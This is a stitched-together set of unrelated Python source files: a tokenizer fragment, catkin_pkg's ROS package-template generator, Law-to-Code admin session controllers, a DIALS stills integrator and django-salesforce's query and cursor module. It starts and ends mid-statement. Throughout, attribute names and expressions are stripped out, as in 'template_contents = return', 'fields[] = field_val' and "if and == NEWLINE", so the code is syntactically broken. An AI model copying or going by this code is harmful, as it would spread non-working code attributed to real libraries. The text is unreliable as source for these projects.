= next(tokens) if token.type != NUMBER: raise ParseError('Expecting a number') try: value = int(token.string) except ValueError: raise ParseError('Expecting an integer') return sign * value @classmethod def doc_format(cls): return 'a natural number (positive integer)' class TokenIterator(PeekIterator): """Tokenizes `string` and iterates over the tokens""" def __init__(self, string): self.string = string tokens = generate_tokens(StringIO(string).readline) super().__init__(tokens) def _advance(self): result = super()._advance() if and == NEWLINE and == '': super()._advance() return result class ParseError(Exception): pass # variables class Var(object): def __init__(self, name): super().__init__() = name def __repr__(self): return "{}('{}')".format(type(self).__name__, def __str__(self): return '$({})'.format( def __eq__(self, other): return == class VariableNotDefined(Exception): pass
# Software License Agreement (BSD License) # # Copyright (c) 2012, Willow Garage, Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # * Neither the name of Willow Garage, Inc. nor the names of its # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. from __future__ import print_function import getpass import os import string import sys from catkin_pkg.cmake import configure_file from catkin_pkg.cmake import get_metapackage_cmake_template_path from catkin_pkg.package import Dependency from catkin_pkg.package import Package from catkin_pkg.package import PACKAGE_MANIFEST_FILENAME from catkin_pkg.package import Person class PackageTemplate(Package): def __init__(self, catkin_deps=None, system_deps=None, boost_comps=None, **kwargs): super(PackageTemplate, self).__init__(**kwargs) self.catkin_deps = catkin_deps or [] self.system_deps = system_deps or [] self.boost_comps = boost_comps or [] self.validate() @staticmethod def _create_package_template(package_name, description=None, licenses=None, maintainer_names=None, author_names=None, version=None, catkin_deps=None, system_deps=None, boost_comps=None): """ alternative factory method mapping CLI args to argument for Package class :param package_name: :param description: :param licenses: :param maintainer_names: :param authors: :param version: :param catkin_deps: """ # Sort so they are alphebetical licenses = list(licenses or ["TODO"]) licenses.sort() if not maintainer_names: maintainer_names = [getpass.getuser()] maintainer_names = list(maintainer_names or []) maintainer_names.sort() maintainers = [] for maintainer_name in maintainer_names: maintainers.append( Person(maintainer_name, '%s@todo.todo' % maintainer_name.split()[-1]) ) author_names = list(author_names or []) author_names.sort() authors = [] for author_name in author_names: authors.append(Person(author_name)) catkin_deps = list(catkin_deps or []) catkin_deps.sort() pkg_catkin_deps = [] build_depends = [] run_depends = [] buildtool_depends = [Dependency('catkin')] for dep in catkin_deps: if dep.lower() == 'catkin': catkin_deps.remove(dep) continue if dep.lower() == 'genmsg': sys.stderr.write('WARNING: Packages with messages or services should not depend on genmsg, but on message_generation and message_runtime\n') buildtool_depends.append(Dependency('genmsg')) continue if dep.lower() == 'message_generation': if not 'message_runtime' in catkin_deps: sys.stderr.write('WARNING: Packages with messages or services should depend on both message_generation and message_runtime\n') build_depends.append(Dependency('message_generation')) continue if dep.lower() == 'message_runtime': if not 'message_generation' in catkin_deps: sys.stderr.write('WARNING: Packages with messages or services should depend on both message_generation and message_runtime\n') run_depends.append(Dependency('message_runtime')) continue pkg_catkin_deps.append(Dependency(dep)) for dep in pkg_catkin_deps: build_depends.append(dep) run_depends.append(dep) if boost_comps: if not system_deps: system_deps = ['boost'] elif not 'boost' in system_deps: system_deps.append('boost') for dep in system_deps or []: if not dep.lower().startswith('python-'): build_depends.append(Dependency(dep)) run_depends.append(Dependency(dep)) package_temp = PackageTemplate( name=package_name, version=version or '0.0.0', description=description or 'The %s package' % package_name, buildtool_depends=buildtool_depends, build_depends=build_depends, run_depends=run_depends, catkin_deps=catkin_deps, system_deps=system_deps, boost_comps=boost_comps, licenses=licenses, authors=authors, maintainers=maintainers, urls=[]) return package_temp def read_template_file(filename, rosdistro): template_dir = os.path.join(os.path.dirname(__file__), 'templates') templates = [] templates.append(os.path.join(template_dir, rosdistro, '' % filename)) templates.append(os.path.join(template_dir, '' % filename)) for template in templates: if os.path.isfile(template): with open(template, 'r') as fhand: template_contents = return template_contents raise IOError( "Could not read template for ROS distro " "'{}' at '{}': ".format(rosdistro, ', '.join(templates)) + "no such file or directory" ) def _safe_write_files(newfiles, target_dir): """ writes file contents to target_dir/filepath for all entries of newfiles. Aborts early if files exist in places for new files or directories :param newfiles: a dict {filepath: contents} :param target_dir: a string """ # first check no filename conflict exists for filename in newfiles: target_file = os.path.join(target_dir, filename) if os.path.exists(target_file): raise ValueError('File exists: %s' % target_file) dirname = os.path.dirname(target_file) while(dirname != target_dir): if os.path.isfile(dirname): raise ValueError('Cannot create directory, file exists: %s' % dirname) dirname = os.path.dirname(dirname) for filename, content in newfiles.items(): target_file = os.path.join(target_dir, filename) dirname = os.path.dirname(target_file) if not os.path.exists(dirname): os.makedirs(dirname) # print(target_file, content) with open(target_file, 'ab') as fhand: fhand.write(content.encode()) print('Created file %s' % os.path.relpath(target_file, os.path.dirname(target_dir))) def create_package_files(target_path, package_template, rosdistro, newfiles=None, meta=False): """ creates several files from templates to start a new package. :param target_path: parent folder where to create the package :param package_template: contains the required information :param rosdistro: name of the distro to look up respective template :param newfiles: dict {filepath: contents} for additional files to write """ if newfiles is None: newfiles = {} # allow to replace default templates when path string is equal manifest_path = os.path.join(target_path, PACKAGE_MANIFEST_FILENAME) if manifest_path not in newfiles: newfiles[manifest_path] = \ create_package_xml(package_template, rosdistro, meta=meta) cmake_path = os.path.join(target_path, 'CMakeLists.txt') if not cmake_path in newfiles: newfiles[cmake_path] = create_cmakelists(package_template, rosdistro, meta=meta) _safe_write_files(newfiles, target_path) if 'roscpp' in package_template.catkin_deps: fname = os.path.join(target_path, 'include', os.makedirs(fname) print('Created folder %s' % os.path.relpath(fname, os.path.dirname(target_path))) if 'roscpp' in package_template.catkin_deps or \ 'rospy' in package_template.catkin_deps: fname = os.path.join(target_path, 'src') os.makedirs(fname) print('Created folder %s' % os.path.relpath(fname, os.path.dirname(target_path))) class CatkinTemplate(string.Template): """subclass to use @ instead of $ as markers""" delimiter = '@' escape = '@' def create_cmakelists(package_template, rosdistro, meta=False): """ :param package_template: contains the required information :returns: file contents as string """ if meta: template_path = get_metapackage_cmake_template_path() temp_dict = {'name':, 'metapackage_arguments': '' } return configure_file(template_path, temp_dict) else: cmakelists_txt_template = read_template_file('CMakeLists.txt', rosdistro) ctemp = CatkinTemplate(cmakelists_txt_template) if package_template.catkin_deps == []: components = '' else: components = ' COMPONENTS\n %s\n' % '\n '.join(package_template.catkin_deps) boost_find_package = \ ('' if not package_template.boost_comps else ('find_package(Boost REQUIRED COMPONENTS %s)\n' % ' '.join(package_template.boost_comps))) system_find_package = '' for sysdep in package_template.system_deps: if sysdep == 'boost': continue if sysdep.startswith('python-'): system_find_package += '# ' system_find_package += 'find_package(%s REQUIRED)\n' % sysdep # provide dummy values catkin_depends = (' '.join(package_template.catkin_deps) if package_template.catkin_deps else 'other_catkin_pkg') system_depends = (' '.join(package_template.system_deps) if package_template.system_deps else 'system_lib') message_pkgs = [pkg for pkg in package_template.catkin_deps if pkg.endswith('_msgs')] if message_pkgs: message_depends = '# %s' % '# '.join(message_pkgs) else: message_depends = '# std_msgs # Or other packages containing msgs' temp_dict = {'name':, 'components': components, 'include_directories': _create_include_macro(package_template), 'boost_find': boost_find_package, 'systems_find': system_find_package, 'catkin_depends': catkin_depends, 'system_depends': system_depends, 'target_libraries': _create_targetlib_args(package_template), 'message_dependencies': message_depends } return ctemp.substitute(temp_dict) def _create_targetlib_args(package_template): result = '# ${catkin_LIBRARIES}\n' if package_template.boost_comps: result += '# ${Boost_LIBRARIES}\n' if package_template.system_deps: result += (''.join(['# ${%s_LIBRARIES}\n' % sdep for sdep in package_template.system_deps])) return result def _create_include_macro(package_template): result = '# include_directories(include)' includes = [] if package_template.catkin_deps: includes.append('${catkin_INCLUDE_DIRS}') if package_template.boost_comps: includes.append('${Boost_INCLUDE_DIRS}') if package_template.system_deps: deplist = [] for sysdep in package_template.system_deps: if not sysdep.startswith('python-'): deplist.append(sysdep) includes.append('${%s_INCLUDE_DIRS}' % sysdep) if deplist: result += '\n# TODO: Check names of system library include directories (%s)' % ', '.join(deplist) if includes: result += '\ninclude_directories(\n %s\n)' % '\n '.join(includes) return result def _create_depend_tag(dep_type, name, version_eq=None, version_lt=None, version_lte=None, version_gt=None, version_gte=None): """ Helper to create xml snippet for package.xml """ version_string = [] for key, var in {'version_eq': version_eq, 'version_lt': version_lt, 'version_lte': version_lte, 'version_gt': version_gt, 'version_gte': version_gte}.items(): if var is not None: version_string.append(' %s="%s"' % (key, var)) result = ' <%s%s>%s</%s>\n' % (dep_type, ''.join(version_string), name, dep_type) return result def create_package_xml(package_template, rosdistro, meta=False): """ :param package_template: contains the required information :returns: file contents as string """ package_xml_template = \ read_template_file(PACKAGE_MANIFEST_FILENAME, rosdistro) ctemp = CatkinTemplate(package_xml_template) temp_dict = {} for key in package_template.__slots__: temp_dict[key] = getattr(package_template, key) if package_template.version_abi: temp_dict['version_abi'] = ' abi="%s"' % package_template.version_abi else: temp_dict['version_abi'] = '' if not package_template.description: temp_dict['description'] = 'The %s package ...' % licenses = [] for plicense in package_template.licenses: licenses.append(' <license>%s</license>\n' % plicense) temp_dict['licenses'] = ''.join(licenses) def get_person_tag(tagname, person): email_string = ( "" if is None else 'email="%s"' % ) return ' <%s %s>%s</%s>\n' % (tagname, email_string,, tagname) maintainers = [] for maintainer in package_template.maintainers: maintainers.append(get_person_tag('maintainer', maintainer)) temp_dict['maintainers'] = ''.join(maintainers) urls = [] for url in package_template.urls: type_string = ("" if url.type is None else 'type="%s"' % url.type) urls.append(' <url %s >%s</url>\n' % (type_string, url.url)) temp_dict['urls'] = ''.join(urls) authors = [] for author in package_template.authors: authors.append(get_person_tag('author', author)) temp_dict['authors'] = ''.join(authors) dependencies = [] dep_map = { 'build_depend': package_template.build_depends, 'buildtool_depend': package_template.buildtool_depends, 'run_depend': package_template.run_depends, 'test_depend': package_template.test_depends, 'conflict': package_template.conflicts, 'replace': package_template.replaces } for dep_type in ['buildtool_depend', 'build_depend', 'run_depend', 'test_depend', 'conflict', 'replace']: for dep in sorted(dep_map[dep_type], key=lambda x: if 'depend' in dep_type: dep_tag = _create_depend_tag( dep_type,, dep.version_eq, dep.version_lt, dep.version_lte, dep.version_gt, dep.version_gte ) dependencies.append(dep_tag) else: dependencies.append(_create_depend_tag(dep_type, temp_dict['dependencies'] = ''.join(dependencies) exports = [] if package_template.exports is not None: for export in package_template.exports: if export.content is not None: print('WARNING: Create package does not know how to ' 'serialize exports with content: ' '%s, %s, ' % (export.tagname, export.attributes) + '%s' % (export.content), file=sys.stderr) else: attribs = [' %s="%s"' % (k, v) for (k, v) in export.attributes.items()] line = ' <%s%s/>\n' % (export.tagname, ''.join(attribs)) exports.append(line) if meta: exports.append(' <metapackage/>') temp_dict['exports'] = ''.join(exports) temp_dict['components'] = package_template.catkin_deps return ctemp.substitute(temp_dict)
# -*- coding: utf-8 -*- # Law-to-Code -- Extract formulas & parameters from laws # By: Emmanuel Raviart <> # # Copyright (C) 2013 OpenFisca Team # # # This file is part of Law-to-Code. # # Law-to-Code is free software; you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # Law-to-Code is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <>. """Controllers for sessions""" import collections import logging import webob from .. import contexts, conv, model, paginations, templates, urls, wsgihelpers log = logging.getLogger(__name__) @wsgihelpers.wsgify def admin_delete(req): ctx = contexts.Ctx(req) session = ctx.node if not model.is_admin(ctx): return wsgihelpers.forbidden(ctx, explanation = ctx._("Deletion forbidden"), message = ctx._("You can not delete a session."), title = ctx._('Operation denied'), ) if req.method == 'POST': session.delete(ctx, safe = True) return wsgihelpers.redirect(ctx, location = model.Session.get_admin_class_url(ctx)) return templates.render(ctx, '/sessions/admin-delete.mako', session = session) @wsgihelpers.wsgify def admin_index(req): ctx = contexts.Ctx(req) model.is_admin(ctx, check = True) assert req.method == 'GET' page_number, error = conv.pipe( conv.input_to_int, conv.test_greater_or_equal(1), conv.default(1), )(req.params.get('page'), state = ctx) if error is not None: return wsgihelpers.not_found(ctx, explanation = ctx._('Page number error: {}').format(error)) cursor = model.Session.find(as_class = collections.OrderedDict) pager = paginations.Pager(item_count = cursor.count(), page_number = page_number) sessions = cursor.skip(pager.first_item_index or 0).limit(pager.page_size) return templates.render(ctx, '/sessions/admin-index.mako', sessions = sessions, pager = pager) @wsgihelpers.wsgify def admin_view(req): ctx = contexts.Ctx(req) session = ctx.node model.is_admin(ctx, check = True) return templates.render(ctx, '/sessions/admin-view.mako', session = session) def route_admin(environ, start_response): req = webob.Request(environ) ctx = contexts.Ctx(req) session, error = conv.pipe( conv.input_to_uuid, conv.not_none, model.Session.uuid_to_instance, )(req.urlvars.get('token'), state = ctx) if error is not None: return wsgihelpers.not_found(ctx, explanation = ctx._('Session Error: {}').format(error))( environ, start_response) ctx.node = session router = urls.make_router( ('GET', '^/?$', admin_view), (('GET', 'POST'), '^/delete/?$', admin_delete), ) return router(environ, start_response) def route_admin_class(environ, start_response): router = urls.make_router( ('GET', '^/?$', admin_index), (None, '^/(?P<token>[^/]+)(?=/|$)', route_admin), ) return router(environ, start_response)
class ReflectionBlockIntegratorStills: """A class to perform the integration.""" def __init__(self, params, experiments, reference, extractor=None): """Initialise the integrator.""" from dials.algorithms import shoebox # Ensure we have 1 experiment at the moment assert len(experiments) == 1 assert extractor is not None # Save the parameters self.params = params self.experiments = experiments self.extractor = extractor # Create the shoebox masker n_sigma = params.integration.shoebox.n_sigma assert n_sigma > 0 self._mask_profiles = shoebox.MaskerEmpirical( experiments[0], reference=reference ) def integrate(self): """Integrate all the reflections.""" from dials.algorithms.shoebox import MaskCode from dials.array_family import flex result = flex.reflection_table() for indices, reflections in self.extractor: self._mask_profiles(reflections, None) reflections.integrate(self.experiments[0]) bg_code = MaskCode.Valid | MaskCode.BackgroundUsed fg_code = MaskCode.Valid | MaskCode.Foreground n_bg = reflections["shoebox"].count_mask_values(bg_code) n_fg = reflections["shoebox"].count_mask_values(fg_code) reflections["n_background"] = n_bg reflections["n_foreground"] = n_fg del reflections["shoebox"] del reflections["rs_shoebox"] result.extend(reflections) assert len(result) > 0 result.sort("miller_index") return result class IntegratorStills: """Integrate reflections""" def __init__(self, params, exlist, reference=None, predicted=None, shoeboxes=None): """Initialise the script.""" assert reference is not None # Load the extractor based on the input if shoeboxes is not None: extractor = self._load_extractor(shoeboxes, params, exlist) else: if predicted is None: predicted = self._predict_reflections(params, exlist) # predicted = self._filter_reflections(params, exlist, predicted) # FIXME predicted = self._match_with_reference(predicted, reference) import math from annlib_ext import AnnAdaptor from dials.array_family import flex matcheddata = predicted.get_flags(predicted.flags.reference_spot) ) A = AnnAdaptor(matcheddata[""].as_double(), 3, 10) A.query(predicted[""].as_double()) bboxes = flex.int6() for i, ref in enumerate(predicted): nn_pred = [matcheddata[A.nn[i * 10 + j]] for j in range(10)] nn_ref = [ reference[reference["miller_index"].first_index(r["miller_index"])] for r in nn_pred ] max_x = max([r["bbox"][1] - r["bbox"][0] for r in nn_ref]) max_y = max([r["bbox"][3] - r["bbox"][2] for r in nn_ref]) panel = exlist[ref["id"]].detector[ref["panel"]] imgsize_x, imgsize_y = panel.get_image_size() x1 = int(math.floor(ref["xyzcal.px"][0] - (max_x / 2))) x2 = int(math.ceil(ref["xyzcal.px"][0] + (max_x / 2))) y1 = int(math.floor(ref["xyzcal.px"][1] - (max_y / 2))) y2 = int(math.ceil(ref["xyzcal.px"][1] + (max_y / 2))) if x1 < 0: x1 = 0 if y1 < 0: y1 = 0 if x2 > imgsize_x: x2 = imgsize_x if y2 > imgsize_y: y2 = imgsize_y bboxes.append((x1, x2, y1, y2, 0, 1)) predicted["bbox"] = bboxes extractor = self._create_extractor(params, exlist, predicted) # Initialise the integrator self._integrator = ReflectionBlockIntegratorStills( params, exlist, reference, extractor ) def integrate(self): """Integrate the reflections.""" return self._integrator.integrate() def _match_with_reference(self, predicted, reference): """Match predictions with reference spots.""" from dials.algorithms.spot_finding.spot_matcher import SpotMatcher from dials.util.command_line import Command Command.start("Matching reference spots with predicted reflections") match = SpotMatcher(max_separation=1) rind, pind = match(reference, predicted) h1 =["miller_index"] h2 =["miller_index"] mask = h1 == h2 predicted.set_flags(, predicted.flags.reference_spot) Command.end( "Matched %d reference spots with predicted reflections" % mask.count(True) ) return predicted def _load_extractor(self, filename, params, exlist): """Load the shoebox extractor.""" from dials.model.serialize.reflection_block import ReflectionBlockExtractor assert len(exlist) == 1 imageset = exlist[0].imageset return ReflectionBlockExtractor( filename, params.integration.shoebox.block_size, imageset ) def _create_extractor(self, params, exlist, predicted): """Create the extractor.""" from dials.model.serialize.reflection_block import ReflectionBlockExtractor assert len(exlist) == 1 imageset = exlist[0].imageset return ReflectionBlockExtractor( "shoebox.dat", params.integration.shoebox.block_size, imageset, predicted ) def _predict_reflections(self, params, experiments): """Predict all the reflections.""" from dials.array_family import flex result = flex.reflection_table() for i, experiment in enumerate(experiments): predicted = flex.reflection_table.from_predictions(experiment) predicted["id"] =, i) result.extend(predicted) return result def _filter_reflections(self, params, experiments, reflections): """Filter the reflections to integrate.""" from dials.algorithms import filtering from dials.array_family import flex from dials.util.command_line import Command # Set all reflections which overlap bad pixels to zero Command.start("Filtering reflections by detector mask") if experiments[0].scan is None: array_range = 1 else: array_range = experiments[0].scan.get_array_range() mask = filtering.by_detector_mask( reflections["bbox"], experiments[0].imageset.get_raw_data(0)[0] >= 0, array_range, ) reflections.del_selected(not mask) Command.end(f"Filtered {len(reflections)} reflections by detector mask") # Filter the reflections by zeta min_zeta = params.integration.filter.by_zeta if min_zeta > 0: Command.start(f"Filtering reflections by zeta >= {min_zeta:f}") zeta = reflections.compute_zeta(experiments[0]) reflections.del_selected(flex.abs(zeta) < min_zeta) n = len(reflections) Command.end("Filtered %d reflections by zeta >= %f" % (n, min_zeta)) return reflections
# django-salesforce # # by Phil Christensen # (c) 2012-2013 Freelancers Union ( # See for details # """ Salesforce object query and queryset customizations. """ # TODO hynekcer: class CursorWrapper and function handle_api_exceptions should # be moved to salesforce.backend.driver at the next big refactoring # (Evenso some low level internals of salesforce.auth should be moved to # salesforce.backend.driver.Connection) import logging, types, datetime, decimal from django.conf import settings from django.core.serializers import python from django.core.exceptions import ImproperlyConfigured from django.db import connections from django.db.models import query, Count from django.db.models.sql import Query, RawQuery, constants, subqueries from django.db.models.sql.datastructures import EmptyResultSet from django.db.models.query_utils import deferred_class_factory from django.utils.six import PY3 from itertools import islice import requests import pytz from salesforce import auth, models, DJANGO_16_PLUS, DJANGO_17_PLUS, DJANGO_18_PLUS from salesforce import DJANGO_184_PLUS from salesforce.backend.compiler import SQLCompiler from salesforce.fields import NOT_UPDATEABLE, NOT_CREATEABLE, SF_PK try: from urllib.parse import urlencode except ImportError: from urllib import urlencode try: import json except ImportError: import simplejson as json log = logging.getLogger(__name__) API_STUB = '/services/data/v34.0' # Values of seconds are with 3 decimal places in SF, but they are rounded to # whole seconds for the most of fields. SALESFORCE_DATETIME_FORMAT = '%Y-%m-%dT%H:%M:%S.%f+0000' DJANGO_DATETIME_FORMAT = '%Y-%m-%d %H:%M:%S.%f-00:00' request_count = 0 def quoted_string_literal(s, d): """ SOQL requires single quotes to be escaped. """ try: return "'%s'" % (s.replace("\\", "\\\\").replace("'", "\\'"),) except TypeError as e: raise NotImplementedError("Cannot quote %r objects: %r" % (type(s), s)) def process_args(args): """ Perform necessary quoting on the arg list. """ def _escape(item, conv): if(isinstance(item, models.SalesforceModel)): return conv.get(models.SalesforceModel, conv[str])(item, conv) if(isinstance(item, decimal.Decimal)): return conv.get(decimal.Decimal, conv[str])(item, conv) return conv.get(type(item), conv[str])(item, conv) return tuple([_escape(x, sql_conversions) for x in args]) def process_json_args(args): """ Perform necessary JSON quoting on the arg list. """ def _escape(item, conv): if(isinstance(item, models.SalesforceModel)): return conv.get(models.SalesforceModel, conv[str])(item, conv) if(isinstance(item, decimal.Decimal)): return conv.get(decimal.Decimal, conv[str])(item, conv) return conv.get(type(item), conv[str])(item, conv) return tuple([_escape(x, json_conversions) for x in args]) def handle_api_exceptions(url, f, *args, **kwargs): """Call REST API and handle exceptions Params: f: requests.get or _cursor: sharing the debug information in cursor """ global request_count from salesforce.backend import base # The 'verify' option is about verifying SSL certificates kwargs_in = {'timeout': getattr(settings, 'SALESFORCE_QUERY_TIMEOUT', 3), 'verify': True} kwargs_in.update(kwargs) _cursor = kwargs_in.pop('_cursor', None) log.debug('Request API URL: %s' % url) request_count += 1 try: response = f(url, *args, **kwargs_in) # TODO some timeouts can be rarely raised as "SSLError: The read operation timed out" except requests.exceptions.Timeout: raise base.SalesforceError("Timeout, URL=%s" % url) if response.status_code == 401: # Unauthorized (expired or invalid session ID or OAuth) data = response.json()[0] if(data['errorCode'] == 'INVALID_SESSION_ID'): token = db_alias=f.__self__.auth.reauthenticate() if('headers' in kwargs): kwargs['headers'].update(dict(Authorization='OAuth %s' % token)) try: response = f(url, *args, **kwargs_in) except requests.exceptions.Timeout: raise base.SalesforceError("Timeout, URL=%s" % url) if response.status_code in (200, 201, 204): return response # TODO Remove this verbose setting after tuning of specific messages. # Currently it is better more or less. # verbose = not getattr(getattr(_cursor, 'query', None), 'debug_silent', False) # Errors are reported in the body data = response.json()[0] if response.status_code == 404: # ResourceNotFound if (f.__func__.__name__ == 'delete') and data['errorCode'] in ( 'ENTITY_IS_DELETED', 'INVALID_CROSS_REFERENCE_KEY'): # It is a delete command and the object is in trash bin or # completely deleted or it only could be a valid Id for this type # then is ignored similarly to delete by a classic database query: # DELETE FROM xy WHERE id = 'something_deleted_yet' return None else: # if this Id can not be ever valid. raise base.SalesforceError("Couldn't connect to API (404): %s, URL=%s" % (response.text, url), data, response, verbose) if(data['errorCode'] == 'INVALID_FIELD'): raise base.SalesforceError(data['message'], data, response, verbose) elif(data['errorCode'] == 'MALFORMED_QUERY'): raise base.SalesforceError(data['message'], data, response, verbose) elif(data['errorCode'] == 'INVALID_FIELD_FOR_INSERT_UPDATE'): raise base.SalesforceError(data['message'], data, response, verbose) elif(data['errorCode'] == 'METHOD_NOT_ALLOWED'): raise base.SalesforceError('%s: %s' % (url, data['message']), data, response, verbose) # some kind of failed query else: raise base.SalesforceError('%s' % data, data, response, verbose) def prep_for_deserialize(model, record, using, init_list=None): """ Convert a record from SFDC (decoded JSON) to dict(model string, pk, fields) If fixes fields of some types. If names of required fields `init_list `are specified, then only these fields are processed. """ from salesforce.backend import base # TODO the parameter 'using' is not currently important. attribs = record.pop('attributes') mod = model.__module__.split('.') if(mod[-1] == 'models'): app_label = mod[-2] elif(hasattr(model._meta, 'app_label')): app_label = getattr(model._meta, 'app_label') else: raise ImproperlyConfigured("Can't discover the app_label for %s, you must specify it via model meta options.") if len(record.keys()) == 1 and model._meta.db_table in record: while len(record) == 1: record = list(record.values())[0] fields = dict() for x in model._meta.fields: if not x.primary_key and (not init_list or in init_list): if x.column.endswith('.Type'): # Type of generic foreign key simple_column, _ = x.column.split('.') fields[] = record[simple_column]['Type'] else: # Normal fields field_val = record[x.column] #db_type = x.db_type(connection=connections[using]) if(x.__class__.__name__ == 'DateTimeField' and field_val is not None): d = datetime.datetime.strptime(field_val, SALESFORCE_DATETIME_FORMAT) import pytz d = d.replace(tzinfo=pytz.utc) if settings.USE_TZ: fields[] = d.strftime(DJANGO_DATETIME_FORMAT) else: tz = pytz.timezone(settings.TIME_ZONE) d = tz.normalize(d.astimezone(tz)) fields[] = d.strftime(DJANGO_DATETIME_FORMAT[:-6]) else: fields[] = field_val if init_list and set(init_list).difference(fields).difference([SF_PK]): raise base.DatabaseError("Not found some expected fields") return dict( model = '.'.join([app_label, model.__name__]), pk = record.pop('Id'), fields = fields, ) def extract_values(query): """ Extract values from insert or update query. """ d = dict() fields = query.model._meta.fields for index in range(len(fields)): field = fields[index] if (field.get_internal_type() == 'AutoField' or isinstance(query, subqueries.UpdateQuery) and (getattr(field, 'sf_read_only', 0) & NOT_UPDATEABLE) != 0 or isinstance(query, subqueries.InsertQuery) and (getattr(field, 'sf_read_only', 0) & NOT_CREATEABLE) != 0): continue if(isinstance(query, subqueries.UpdateQuery)): value_or_empty = [value for qfield, model, value in query.values if ==] if value_or_empty: [value] = value_or_empty else: assert len(query.values) < len(fields), \ "Match name can miss only with an 'update_fields' argument." continue else: # insert # TODO bulk insert assert len(query.objs) == 1, "bulk_create is not supported by Salesforce REST API" value = getattr(query.objs[0], field.attname) # The 'DEFAULT' is a backward compatibility name. if isinstance(field, (models.ForeignKey, models.BooleanField)) and value in ('DEFAULT', 'DEFAULTED_ON_CREATE'): continue if isinstance(value, models.DefaultedOnCreate): continue [arg] = process_json_args([value]) d[field.column] = arg return d class SalesforceRawQuerySet(query.RawQuerySet): def __len__(self): if self.query.cursor is None: # force the query self.query.get_columns() return self.query.cursor.rowcount class SalesforceQuerySet(query.QuerySet): """ Use a custom SQL compiler to generate SOQL-compliant queries. """ def iterator(self): """ An iterator over the results from applying this QuerySet to the remote web service. """ try: sql, params = SQLCompiler(self.query, connections[self.db], None).as_sql() except EmptyResultSet: raise StopIteration cursor = CursorWrapper(connections[self.db], self.query) cursor.execute(sql, params) pfd = prep_for_deserialize only_load = self.query.get_loaded_field_names() load_fields = [] # If only/defer clauses have been specified, # build the list of fields that are to be loaded. if not only_load: model_cls = self.model init_list = None else: if DJANGO_16_PLUS: fields = self.model._meta.concrete_fields fields_with_model = self.model._meta.get_concrete_fields_with_model() else: fields = self.model._meta.fields fields_with_model = self.model._meta.get_fields_with_model() for field, model in fields_with_model: if model is None: model = self.model try: selected_name = field.attname if DJANGO_18_PLUS else if selected_name in only_load[model]: # Add a field that has been explicitly included load_fields.append( except KeyError: # Model wasn't explicitly listed in the only_load table # Therefore, we need to load all fields from this model load_fields.append( init_list = [] skip = set() for field in fields: if not in load_fields: skip.add(field.attname) else: init_list.append( model_cls = deferred_class_factory(self.model, skip) field_names = self.query.get_loaded_field_names() for res in python.Deserializer(pfd(model_cls, r, self.db, init_list) for r in cursor.results): # Store the source database of the object res.object._state.db = self.db # This object came from the database; it's not being added. res.object._state.adding = False yield res.object def query_all(self): """ Allows querying for also deleted or merged records. Lead.objects.query_all().filter(IsDeleted=True,...) """ obj = self._clone(klass=SalesforceQuerySet) obj.query.set_query_all() return obj class SalesforceRawQuery(RawQuery): def clone(self, using): return SalesforceRawQuery(self.sql, using, params=self.params) def get_columns(self): if self.cursor is None: self._execute_query() converter = connections[self.using].introspection.table_name_converter if self.cursor.rowcount > 0: return [converter(col) for col in self.cursor.first_row.keys() if col != 'attributes'] # TODO hy: A more general fix is desirable with rewriting more code. # This is changed due to Django 1.8.4+ # related to return ['Id'] if DJANGO_184_PLUS else [SF_PK] def _execute_query(self): self.cursor = CursorWrapper(connections[self.using], self) self.cursor.execute(self.sql, self.params) def __repr__(self): return "<SalesforceRawQuery: %s; %r>" % (self.sql, tuple(self.params)) class SalesforceQuery(Query): """ Override aggregates. """ # Warn against name collision: The name 'aggregates' is the name of # a new property introduced by Django 1.7 to the parent class # 'django.db.models.sql.query.Query'. # 'aggregates_module' is overriden here, to be visible in the base class. from salesforce.backend import aggregates as aggregates_module def __init__(self, *args, **kwargs): super(SalesforceQuery, self).__init__(*args, **kwargs) self.is_query_all = False self.first_chunk_len = None self.max_depth = 1 def clone(self, klass=None, memo=None, **kwargs): query = Query.clone(self, klass, memo, **kwargs) query.is_query_all = self.is_query_all return query def has_results(self, using): q = self.clone() compiler = q.get_compiler(using=using) return bool(compiler.execute_sql(constants.SINGLE)) def set_query_all(self): self.is_query_all = True if DJANGO_18_PLUS: def get_count(self, using): """ Performs a COUNT() query using the current filter constraints. """ obj = self.clone() obj.add_annotation(Count('pk'), alias='x_sf_count', is_summary=True) number = obj.get_aggregation(using, ['x_sf_count'])['x_sf_count'] if number is None: number = 0 return number class CursorWrapper(object): """ A wrapper that emulates the behavior of a database cursor. This is the class that is actually responsible for making connections to the SF REST API """ def __init__(self, db, query=None): """ Connect to the Salesforce API. """ self.db = db self.query = query self.session = db.sf_session # A consistent value of empty self.results after execute will be `iter([])` self.results = None self.rowcount = None self.first_row = None def __enter__(self): return self def __exit__(self, type, value, traceback): self.close() @property def oauth(self): return self.session.auth.authenticate() def execute(self, q, args=()): """ Send a query to the Salesforce API. """ from salesforce.backend import base self.rowcount = None if isinstance(self.query, SalesforceQuery) or self.query is None: response = self.execute_select(q, args) elif 